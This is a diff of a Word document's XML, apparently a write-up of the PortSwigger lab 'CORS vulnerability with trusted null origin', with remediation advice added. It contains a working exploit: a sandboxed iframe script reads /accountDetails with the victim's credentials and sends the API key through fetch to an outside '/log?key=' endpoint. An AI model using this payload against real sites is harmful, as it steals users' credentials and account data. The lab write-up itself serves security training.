--- a/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 2 - CORS vulnerability with trusted null origin.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 2 - CORS vulnerability with trusted null origin.docx
@@ -124,8 +124,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">Open the Proxy tab in BurpSuite and we notice that there is a request made named </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Open the Proxy tab in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>BurpSuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and we notice that there is a request made named </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -136,6 +155,7 @@
         </w:rPr>
         <w:t>accountDetails</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -437,7 +457,43 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">        &lt;iframe style="display: none;" sandbox="allow-scripts" srcdoc="</w:t>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> style="display: none;" sandbox="allow-scripts" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>srcdoc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>="</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -471,24 +527,88 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">            var xhr = new XMLHttpRequest();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            var url = 'https://ac371f531f693ef3c07b84de00630017.web-security-academy.net'</w:t>
+        <w:t xml:space="preserve">            var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'https://ac371f531f693ef3c07b84de00630017.web-security-academy.net'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -515,41 +635,117 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">            xhr.onreadystatechange = function() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                if (xhr.readyState == XMLHttpRequest.DONE) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                    fetch('http://</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr.onreadystatechange</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr.readyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest.DONE</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>fetch(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>'http://</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -565,7 +761,43 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>/log?key=' + xhr.responseText)</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>log?key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=' + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr.responseText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -625,58 +857,172 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">            xhr.open('GET', url + '/accountDetails', true);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            xhr.withCredentials = true;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            xhr.send(null);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        &lt;/script&gt;"&gt;&lt;/iframe&gt;</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr.open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">('GET', </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + '/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>accountDetails</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>', true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr.withCredentials</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = true;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xhr.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(null);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;/script&gt;"&gt;&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -694,6 +1040,23 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve">    &lt;/body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&lt;/html&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -706,14 +1069,6 @@
           <w:szCs w:val="40"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>&lt;/html&gt;</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -735,6 +1090,128 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Restrictive CORS Policy:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>The Access-Control-Allow-Origin header should be set to specific trusted domains, rather than allowing any or null origins. Update the application's CORS configuration to be strict and specific about which origins are permitted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Validation of Origins:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Implement server-side logic to validate the Origin header in incoming requests. If the Origin is unexpected or not in the whitelist of allowed origins, the request should be denied or not given CORS-specific headers in response.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Enhance API Security:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Consider implementing additional layers of security for accessing sensitive data like API keys. This could include using OAuth tokens, re-authentication, or ensuring that such data is not easily accessible even if CORS is bypassed.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -927,11 +1404,103 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6CA37732"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6DE093DA"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
